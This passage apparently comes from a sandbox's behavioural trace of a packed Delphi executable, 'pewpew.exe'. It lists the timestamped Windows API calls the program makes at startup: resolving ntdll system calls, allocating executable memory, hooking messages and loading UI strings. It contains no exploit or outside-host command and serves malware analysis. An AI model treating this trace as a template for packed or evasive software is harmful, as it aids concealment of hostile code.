(hModule=0x77c40000, lpProcName="ZwSetSecurityObject") returned 0x77c61b8c [0061.914] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetVolumeInformationFile") returned 0x77c61c8c [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKeyEx") returned 0x77c61008 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcess") returned 0x77c60804 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcessEx") returned 0x77c5ffdc [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateUserProcess") returned 0x77c6090c [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwResumeThread") returned 0x77c60058 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateThread") returned 0x77c5fff4 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationProcess") returned 0x77c5fac8 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVirtualMemory") returned 0x77c5fbc8 [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeviceIoControlFile") returned 0x77c5f8fc [0061.915] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwProtectVirtualMemory") returned 0x77c60028 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0061.916] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0061.916] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0061.934] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef83c | out: lpPerformanceCount=0x6ef83c*=18229771719) returned 1 [0062.022] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x80000 [0062.022] SysReAllocStringLen (in: pbstr=0x1f18d8*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x1f18d8*="enigma_ide.dll") returned 1 [0062.077] GetDC (hWnd=0x0) returned 0x20109c3 [0062.077] GetDeviceCaps (hdc=0x20109c3, index=90) returned 96 [0062.078] ReleaseDC (hWnd=0x0, hDC=0x20109c3) returned 1 [0062.112] GetDC (hWnd=0x0) returned 0x20109c3 [0062.112] GetDeviceCaps (hdc=0x20109c3, index=104) returned 0 [0062.112] ReleaseDC (hWnd=0x0, hDC=0x20109c3) returned 1 [0062.112] CreatePalette (plpal=0x6ef430) returned 0xffffffffab08099c [0062.112] GetStockObject (i=7) returned 0x1b00017 [0062.112] GetStockObject (i=5) returned 0x1900015 [0062.112] GetStockObject (i=13) returned 0x18a002e [0062.112] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0062.113] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0062.173] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x77130000 [0062.193] LoadStringA (in: hInstance=0xd0000, uID=0xff28, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0062.193] LoadStringA (in: hInstance=0xd0000, uID=0xff27, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0062.193] LoadStringA (in: hInstance=0xd0000, uID=0xff26, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff25, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff24, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff23, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff22, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff21, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff20, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3f, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3e, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3d, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3c, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3b, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff3a, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff39, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff38, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0062.194] LoadStringA (in: hInstance=0xd0000, uID=0xff37, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0062.325] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0ec [0062.326] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0062.326] GetCurrentThreadId () returned 0xb0c [0062.432] GlobalAddAtomA (lpString="EnigmaWndProcPtr000C000000000B0C") returned 0xc044 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfee3, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfee2, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfee1, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfee0, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfeff, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfefe, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfefd, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfefc, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfefb, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfefa, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0062.457] LoadStringA (in: hInstance=0xd0000, uID=0xfef9, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef8, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef7, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef6, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef5, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef4, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef3, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef2, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef1, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xfef0, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0f, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0e, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0d, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0c, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0b, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff0a, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff09, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff08, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff07, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff06, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff05, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff04, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff03, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff02, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff01, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff00, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff1f, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0062.458] LoadStringA (in: hInstance=0xd0000, uID=0xff1e, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff1d, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff1c, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff1b, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff1a, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff19, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff18, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff17, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff16, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0062.459] LoadStringA (in: hInstance=0xd0000, uID=0xff15, lpBuffer=0x6ef42c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0062.483] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc16a [0062.484] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc168 [0062.553] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75590000 [0062.553] GetProcAddress (hModule=0x75590000, lpProcName="InitializeFlatSB") returned 0x755c266f [0062.553] GetProcAddress (hModule=0x75590000, lpProcName="UninitializeFlatSB") returned 0x755c2542 [0062.553] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollProp") returned 0x755c1d29 [0062.553] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollProp") returned 0x755c238d [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_EnableScrollBar") returned 0x755c20c9 [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_ShowScrollBar") returned 0x755c1fdb [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollRange") returned 0x755c1e8d [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollInfo") returned 0x755c1f0f [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_GetScrollPos") returned 0x755c1ccd [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollPos") returned 0x755c216d [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollInfo") returned 0x755c22be [0062.554] GetProcAddress (hModule=0x75590000, lpProcName="FlatSB_SetScrollRange") returned 0x755c21e2 [0062.577] GetModuleHandleA (lpModuleName="User32.dll") returned 0x77130000 [0062.577] GetProcAddress (hModule=0x77130000, lpProcName="SetLayeredWindowAttributes") returned 0x7716ec88 [0062.577] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc0c3 [0062.674] GetVersion () returned 0x1db10106 [0062.674] GetCurrentProcessId () returned 0xbe0 [0062.744] GlobalAddAtomA (lpString="EnigmaDelphi00000BE0") returned 0xc169 [0062.744] GetCurrentThreadId () returned 0xb0c [0062.744] GlobalAddAtomA (lpString="EnigmaControlOfs000C000000000B0C") returned 0xc168 [0062.744] RegisterClipboardFormatA (lpszFormat="ControlOfs000C000000000B0C") returned 0xc160 [0062.745] GetProcAddress (hModule=0x77130000, lpProcName="GetMonitorInfoA") returned 0x77154413 [0062.745] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0062.745] GetSystemMetrics (nIndex=19) returned 1 [0063.563] GetSystemMetrics (nIndex=75) returned 1 [0063.563] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x228188c, fWinIni=0x0 | out: pvParam=0x228188c) returned 1 [0063.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0063.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ff9) returned 0x0 [0063.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0063.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0063.584] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ffa) returned 0x0 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ffb) returned 0x0 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ffc) returned 0x0 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ffd) returned 0x0 [0063.584] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7fff) returned 0x0 [0063.585] LoadCursorA (hInstance=0xc0000, lpCursorName=0x7ffe) returned 0x0 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0063.585] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0063.585] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0063.585] GetDC (hWnd=0x0) returned 0x20109c3 [0063.585] GetDeviceCaps (hdc=0x20109c3, index=90) returned 96 [0063.585] ReleaseDC (hWnd=0x0, hDC=0x20109c3) returned 1 [0063.585] GetProcAddress (hModule=0x77130000, lpProcName="EnumDisplayMonitors") returned 0x7715451a [0063.585] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x15214c, dwData=0x2281ad8) returned 1 [0063.642] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x6ef797, fWinIni=0x0 | out: pvParam=0x6ef797) returned 1 [0063.642] CreateFontIndirectA (lplf=0x6ef797) returned 0x320a09c8 [0063.642] GetObjectA (in: h=0x320a09c8, c=60, pv=0x6ef588 | out: pv=0x6ef588) returned 60 [0063.642] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x6ef643, fWinIni=0x0 | out: pvParam=0x6ef643) returned 1 [0063.643] CreateFontIndirectA (lplf=0x6ef71f) returned 0x30a09d1 [0063.643] GetObjectA (in: h=0x30a09d1, c=60, pv=0x6ef588 | out: pv=0x6ef588) returned 60 [0063.643] CreateFontIndirectA (lplf=0x6ef6e3) returned 0x80a09cb [0063.643] GetObjectA (in: h=0x80a09cb, c=60, pv=0x6ef588 | out: pv=0x6ef588) returned 60 [0063.664] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0063.741] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6ef6f7, nSize=0x100 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0063.741] OemToCharA (in: pSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", pDst=0x6ef6f7 | out: pDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0063.902] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x90000 [0064.005] GetKeyboardLayoutList (in: nBuff=64, lpList=0x6ef678 | out: lpList=0x6ef678) returned 1 [0064.112] GetModuleHandleA (lpModuleName="USER32") returned 0x77130000 [0064.112] GetProcAddress (hModule=0x77130000, lpProcName="AnimateWindow") returned 0x7715b531 [0064.164] SysReAllocStringLen (in: pbstr=0x1f23dc*=0x0, psz="Help", len=0x4 | out: pbstr=0x1f23dc*="Help") returned 1 [0064.164] SysReAllocStringLen (in: pbstr=0x1f23d8*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x1f23d8*="YesToAll") returned 1 [0064.164] SysReAllocStringLen (in: pbstr=0x1f23d4*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x1f23d4*="NoToAll") returned 1 [0064.164] SysReAllocStringLen (in: pbstr=0x1f23d0*=0x0, psz="All", len=0x3 | out: pbstr=0x1f23d0*="All") returned 1 [0064.164] SysReAllocStringLen (in: pbstr=0x1f23cc*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x1f23cc*="Ignore") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23c8*=0x0, psz="Retry", len=0x5 | out: pbstr=0x1f23c8*="Retry") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23c4*=0x0, psz="Abort", len=0x5 | out: pbstr=0x1f23c4*="Abort") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23c0*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x1f23c0*="Cancel") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23bc*=0x0, psz="OK", len=0x2 | out: pbstr=0x1f23bc*="OK") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23b8*=0x0, psz="No", len=0x2 | out: pbstr=0x1f23b8*="No") returned 1 [0064.165] SysReAllocStringLen (in: pbstr=0x1f23b4*=0x0, psz="Yes", len=0x3 | out: pbstr=0x1f23b4*="Yes") returned 1 [0064.213] GetTickCount () returned 0x114a600 [0064.213] GetTickCount () returned 0x114a600 [0064.213] GetCurrentThreadId () returned 0xb0c [0064.213] SetWindowsHookExW (idHook=3, lpfn=0x17b2a8, hmod=0x0, dwThreadId=0xb0c) returned 0x5023d [0064.339] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc161 [0064.339] VirtualQuery (in: lpAddress=0x162e6c, lpBuffer=0x6ef7d4, dwLength=0x1c | out: lpBuffer=0x6ef7d4*(BaseAddress=0x162000, AllocationBase=0xc0000, AllocationProtect=0x80, RegionSize=0x2c0000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0064.339] GetCurrentProcessId () returned 0xbe0 [0064.339] GetCurrentThreadId () returned 0xb0c [0064.340] GlobalAddAtomA (lpString="EnigmaDelphi00000BE0") returned 0xc169 [0064.340] GlobalAddAtomA (lpString="EnigmaControlOfs000C000000000B0C") returned 0xc168 [0064.375] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0064.375] DestroyCursor (hCursor=0x0) returned 0 [0064.390] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef83c | out: lpPerformanceCount=0x6ef83c*=18476110928) returned 1 [0064.502] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xb8 [0064.502] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xbc [0064.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.633] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0064.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.633] GetProcAddress (hModule=0x76d30000, lpProcName="DebugBreak") returned 0x76dc41b5 [0064.633] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.634] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0064.634] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.634] GetProcAddress (hModule=0x76d30000, lpProcName="RtlRaiseException") returned 0x0 [0064.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.652] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0064.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.652] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0064.652] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.652] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingA") returned 0x76d45506 [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0064.653] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFileEx") returned 0x76d44c83 [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0064.654] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.654] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="FreeResource") returned 0x76d5d3db [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0064.655] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.655] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0064.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.656] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0064.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.656] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 